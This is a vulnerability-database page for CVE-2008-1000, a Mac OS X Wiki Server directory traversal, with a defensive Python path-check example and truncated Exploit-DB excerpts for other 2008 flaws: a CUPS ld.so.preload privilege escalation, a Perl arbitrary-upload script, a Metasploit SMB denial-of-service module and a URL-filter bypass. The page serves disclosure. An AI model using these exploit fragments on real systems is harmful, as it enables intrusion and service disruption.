CVE-2008-1000
Published 2008-03-18
CVSS 3.1 score 8.5 (High); vector AV:N/AC:M/Au:S/C:C/I:C/A:C
EXPLOIT
Directory traversal vulnerability in ContentServer.py in the Wiki Server in Apple Mac OS X 10.5.2 (aka Leopard) allows remote authenticated users to write arbitrary files via ".." sequences in file attachments.
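The defect above is a file-attachment name that is joined onto a storage directory without being checked. As an added illustration (not Apple's ContentServer.py code, which is not on this page), the Python below puts the insufficient "does it contain '..'" test beside a hardened handler that rejects any path separator and re-verifies the resolved target under the attachment root; the root path and the sample names are constructed for this example.

```python
import os

# Constructed attachment root for this example; the real Wiki Server layout is not on this page.
ATTACHMENT_ROOT = "/var/wiki/attachments"


class UnsafeAttachmentName(ValueError):
    """Raised when a client-supplied attachment name must not be stored."""


def naive_is_safe(client_name: str) -> bool:
    """The insufficient check: only refuses names that contain a literal '..'."""
    return ".." not in client_name


def safe_attachment_path(root: str, client_name: str) -> str:
    """Return the absolute path at which an uploaded attachment may be written.

    Hypothetical hardened handler (not Apple's code): the name must be a single
    path component, and the resolved target is re-checked against the root so
    that an absolute name or a symlink already sitting in the root cannot escape.
    """
    if not client_name or "\x00" in client_name:
        raise UnsafeAttachmentName(repr(client_name))
    # Any separator means the client is choosing a directory; '.' and '..' are
    # the traversal segments themselves. Reject rather than strip.
    if "/" in client_name or "\\" in client_name or client_name in (".", ".."):
        raise UnsafeAttachmentName(repr(client_name))
    root_abs = os.path.realpath(root)
    # os.path.join would discard root for an absolute name; the separator check
    # above already excludes that, and realpath then follows any symlinks.
    target = os.path.realpath(os.path.join(root_abs, client_name))
    if os.path.dirname(target) != root_abs:
        raise UnsafeAttachmentName(repr(client_name))
    return target


def is_safe(root: str, client_name: str) -> bool:
    """Boolean wrapper around safe_attachment_path for the comparison below."""
    try:
        safe_attachment_path(root, client_name)
        return True
    except UnsafeAttachmentName:
        return False


if __name__ == "__main__":
    # Constructed sample names: a plain file, a PoC-style traversal, an absolute path, a backslash name.
    for name in ("notes.txt", "../../tmp/popote.php", "/etc/passwd", "..\\popote.php"):
        print(f"{name!r:26} naive={naive_is_safe(name)!s:5} hardened={is_safe(ATTACHMENT_ROOT, name)}")
```

The absolute-path case is the one the naive test misses entirely: `os.path.join(root, "/etc/passwd")` returns `/etc/passwd`, so a check for ".." alone is not a fix.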
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x_server | — | — |
No detection rules found.
Exploit-DB · 2008-12-22 · CVSS 6.9
CVE-2008-5377 [MEDIUM] CUPS < 1.3.8-4 - Local Privilege Escalation
CUPS
* http://jon.oberheide.org
*
* Usage:
*
* $ gcc cve-2008-5377.c -o cve-2008-5377
* $ ./cve-2008-5377
* $ id
* uid=0(root) gid=1000(vm) ...
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
*
* pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
* a symlink attack on the /tmp/pstopdf.log temporary file.
*
* Operation:
*
* The exploit creates and prints a malformed postscript document that will
* cause the CUPS pstopdf filter to write an error message out to its log
* file that contains the string /tmp/getuid.so. However, since we also
* symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the
* error message and malicious shared library path will be appended to the
* ld.so.preload file, allowing us to elevate privil
Exploit-DB · 2008-12-05
CVE-2008-5659 GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2)
---
source: https://www.securityfocus.com/bid/32909/info
GNU Classpath is prone to a weakness that may result in weaker cryptographic security because its pseudo-random number generator (PRNG) lacks entropy.
Attackers may leverage this issue to obtain sensitive information that can lead to further attacks.
Classpath 0.97.2 is vulnerable; other versions may also be affected.
#include
#include
#include
using namespace Botan;
#include
#include
int main(int argc, char* argv[])
{
Botan::LibraryInitializer init;
// by default start with a guess of 1 minute ago
u64bit time_guess = (std::time(0) - 60);
time_guess *= 1000; // convert to ms
u32bit how_many = 60000; // 60 second range by default
if(argc >= 2)
how_many =
Exploit-DB · 2008-10-29
CVE-2008-6806 7Shop 1.1 - Arbitrary File Upload
---
#!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
my $fname = rand(1000) . ".php"; # int.. yes i know PU!
print Spoofing +
+ Discovered && Coded By: t0pP8uZz +
+ +
+ Contact IRC: irc.rizon.net #sectalk +
+ Vendor not notified! Later versions maybe vuln! +
+ +
+ Discovered On: 25 October 2008 / milw0rm.com +
+ +
+ Script Download: http://7shop.de +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO
print "\nEnter URL(ie: http://site.com/shop): ";
chomp(my $url=);
print "\nEnter File Path(path to local file to upload): ";
chomp(my $file=);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/includes/imageupload.php',
Content_Type => 'form-data',
Content => [ img1 => [ $file, $fname, Cont
Exploit-DB · 2008-09-15
CVE-2008-7012 Accellion File Transfer Appliance Error Report Message - Open Email Relay
---
source: https://www.securityfocus.com/bid/31178/info
Accellion File Transfer Appliance is prone to an open-email-relay vulnerability.
An attacker could exploit this issue by constructing a script that sends unsolicited spam, from a forged sender address, to an unrestricted number of email addresses.
This issue affects Accellion File Transfer Appliance prior to FTA_7_0_189.
https://www.example.com/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM SPAM_ATTACK
HTTP HEADER:
Host: [Accelion web server]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv: 1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr
Exploit-DB · 2008-09-15
CVE-2008-4114 Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)
---
require 'msf/core'
module Msf
module Exploits
module Test
class BugTest 'test exploit',
'Description' =>
"tests",
'Author' => 'tests',
'License' => MSF_LICENSE,
'Version' => '$Revision: 0 $',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000
},
'Targets' =>
[
[
'Windows VISTA',
{
'Platform' => 'win'
}
],
],
'DefaultTarget' => 0))
end
def subexploit(dlenlow, doffset,fillersize)
print_line("1")
datastore['SMBUser']='testuser'
datastore['SMBPass']='testuser'
datastore['SMBDomain']='COBAYA'
datastore['SMBName']='COBAYA'
print_line("2")
connect()
print_line("3")
smb_login()
print_line("4")
pkt = CONST::SMB_CREATE_PKT.make_struct
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['S
Exploit-DB · 2008-06-15
CVE-2008-6702 S.T.A.L.K.E.R. 1.0.06 - Remote Denial of Service
---
// source: https://www.securityfocus.com/bid/29723/info
S.T.A.L.K.E.R. game servers are prone to a remote denial-of-service vulnerability because the software fails to handle exceptional conditions when processing user nicknames.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
/*
by Luigi Auriemma
*/
#include
#include
#include
#include
#include
#ifdef WIN32
#include
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include
#include
#include
#include
#include
#include
#define ONESEC 1
#endif
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
#define VER "0.1"
#define BUFFSZ 1472
#define P
Exploit-DB · 2008-06-04
CVE-2008-1770 Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download
window.resizeTo(500,510);
var bDocReady = false;
var bInsObj = false;
var isLinux = (navigator.userAgent.indexOf("Linux") >= 0);
var isMacFF = (navigator.userAgent.indexOf("Firefox") >= 0 && navigator.userAgent.indexOf("Mac") >= 0);
var isSafari = (navigator.userAgent.indexOf("Safari") >= 0);
var isSolaris = (navigator.userAgent.indexOf("Sun") >= 0);
var isWinFF = (navigator.userAgent.indexOf("Firefox") >= 0 && navigator.userAgent.indexOf("Windows") >= 0);
var isIE7 = (navigator.userAgent.indexOf("MSIE 7") >= 0);
function doLoad() {
// Start automatically
setTimeout("startDLM();", 1000);
return;
}
var bdmIsReady = false;
var bDMStarted = false;
var bDMFailed = false;
var bShutdown = false;
var startTries = 0;
function closeIt
Exploit-DB · 2008-03-17
CVE-2008-1000 Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal
---
source: https://www.securityfocus.com/bid/28278/info
Apple Mac OS X Server Wiki Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access arbitrary files outside of the application's document root directory. This can expose sensitive information that could help the attacker launch further attacks.
Note that attackers must be registered wiki users to exploit this issue.
Wiki Server from Mac OS X Server 10.5 is vulnerable.
Next, we show a Proof of Concept (PoC) attack against Leopard's Wiki
Server. It creates a file 'popote.php' at '/tmp/[xxxxx]/' where
'[xxxxx]' are random hex characters assigned to the fil
Exploit-DB · 2008-01-18
CVE-2008-0384 OpenBSD 4.2 - 'rtlabel_id2name()' Local Null Pointer Dereference Denial of Service
---
/*
* OpenBSD 4.2 rtlabel_id2name() [SIOCGIFRTLABEL ioctl]
* Null Pointer Dereference local Denial of Service Exploit
*
* by Hunger
*
* Advisory:
* http://marc.info/?l=openbsd-security-announce&m=120007327504064
*
* FOR TESTING PURPOSES ONLY!
*
* $ uname -mrsv
* OpenBSD 4.2 GENERIC#375 i386
* $ id
* uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
* $ ftp -V http://hunger.hu/rtlabdos.c
* 100% |******************************************| 1814 00:00
* $ gcc rtlabdos.c -o rtlabdos
* $ ./rtlabdos
* uvm_fault(0xd617865e0, 0x0, 0, 1) -> e
* kernel: page fault trap, code=0
* Stopped at strlcpy+0x1c: movb 0(%edx),%al
* ddb> trace
* strlcpy(d826fd98,0,20,6,d61772a0) at strlcpy+0x1c
* ifioctl(d6033280,c02069
Exploit-DB · 2008-01-14
CVE-2008-7161 Fortinet Fortigate - CRLF Characters URL Filtering Bypass
---
source: https://www.securityfocus.com/bid/27276/info
Fortinet Fortigate is prone to a vulnerability that can allow attackers to bypass the device's URL filtering.
An attacker can exploit this issue to view unauthorized websites, bypassing certain security restrictions. This may lead to other attacks.
This issue affects Fortigate-1000 3.00; other versions may also be affected.
NOTE: This issue may be related to the vulnerability described in BID 16599 (Fortinet Fortigate URL Filtering Bypass Vulnerability).
#!/usr/bin/perl
########################################
# fortiGuard.pl v0.1 - http://www.macula-group.com/
#
# # URL Filtering Bypass proof of concept
# Author: Daniel Regalado aka Danux... Hacker WannaBe!!! (only so
Bugzilla · 2008-07-15 · CVSS 5.0
CVE-2008-3215 [MEDIUM] clamav: DoS / crash via crafted petite file (incomplete fix of CVE-2008-2713)
According to Secunia / clamav upstream, fix for CVE-2008-2713 as originally used
in clamav 0.93.1 (see bug #451761) was incomplete:
https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1000#c4
Following fix is mentioned in the 0.93.2 changelog:
Thu Jul 3 16:15:23 CEST 2008
* libclamav/petite.c: fix another out of bounds memory read (bb#1000)
Reported by Secunia (CVE-2008-2713)
References:
http://www.openwall.com/lists/oss-security/2008/07/08/5
http://lurker.clamav.net/message/20080707.155612.ad411b00.en.html
Discussion:
Upstream patch, now applied in SVN:
http://svn.clamav.net/websvn/diff.php?repname=clamav-devel&path=/branches/0.93/libclamav/petite.c&rev=3920
---
AFAIK this is fixed since
Bugzilla · 2008-06-17 · CVSS 5.0
CVE-2008-2713 [MEDIUM] clamav: DoS / crash via crafted petite file
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-2713 to the following vulnerability:
libclamav/petite.c in ClamAV before 0.93.1 allows remote attackers to cause a
denial of service via a crafted Petite file that triggers an out-of-bounds
read.
Fixed in upstream: 0.93.1
Upstream bug report:
https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1000
Upstream patch:
http://svn.clamav.net/websvn/diff.php?repname=clamav-devel&path=/branches/0.93/libclamav/petite.c&rev=3886
References:
http://www.openwall.com/lists/oss-security/2008/06/15/2
http://www.securityfocus.com/bid/29750
Should affect Fedora and EPEL clamav versions.
Discussion:
clamav-0.93.1-1.fc9 has been submitted as an update for Fedora 9
---
clamav-
References
* http://docs.info.apple.com/article.html?artnum=307562
* http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.html
* http://secunia.com/advisories/29420
* http://www.coresecurity.com/index.php5?module=ContentMod&action=item&id=2189
* http://www.securityfocus.com/archive/1/489786/100/0/threaded
* http://www.securityfocus.com/bid/28278
* http://www.securitytracker.com/id?1019660
* http://www.vupen.com/english/advisories/2008/0924/references
* https://exchange.xforce.ibmcloud.com/vulnerabilities/41278
Published 2008-03-18